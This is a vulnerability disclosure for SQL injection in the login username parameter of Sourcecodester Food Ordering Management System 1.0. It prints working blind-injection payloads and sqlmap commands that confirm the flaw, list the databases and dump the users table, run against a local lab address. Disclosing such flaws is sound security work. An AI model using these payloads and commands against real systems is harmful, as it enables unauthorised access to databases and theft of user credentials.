SQL Injection vulnerability was discovered from Sourcecodester Food Ordering Management System 1.0 (login)
Affected Project: Sourcecodester Food Ordering Management System 1.0 Official Website: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html Version: 1.0
Related Code file: router.php
Injection parameter: username
-
Lack of Input Validation and Sanitization: The username and password fields are directly used in the SQL query without any sanitization or validation. This allows an attacker to manipulate the SQL query by injecting malicious SQL code.
-
Use of Plain SQL Queries: The script likely uses plain SQL queries to interact with the database. Without prepared statements, this approach is highly vulnerable to SQL injection.
Below is the login.php:
http://172.16.76.1/foms/login.php
We will first intercept the login traffic using Burp Suite. Web app is using router.php for login:
Save the intercepted login request to a .txt file and execute sqlmap towards it.
parameter username is vulnerable to boolean-based blind sql injection
Below commands verifies the vulnerability:
sqlmap -r foms_login_php.txt --batch
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 7413=7413 AND 'DhRh'='DhRh&password=admin123
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3140 FROM (SELECT(SLEEP(5)))KQvB) AND 'JGgH'='JGgH&password=admin123
---
Below commnd will list databases:
sqlmap -r foms_login_php.txt --batch -p username --dbs
Below command will dump data inside foms_db database table users:
sqlmap -r foms_login_php.txt --batch -p username --dbs -D foms_db -T users --dump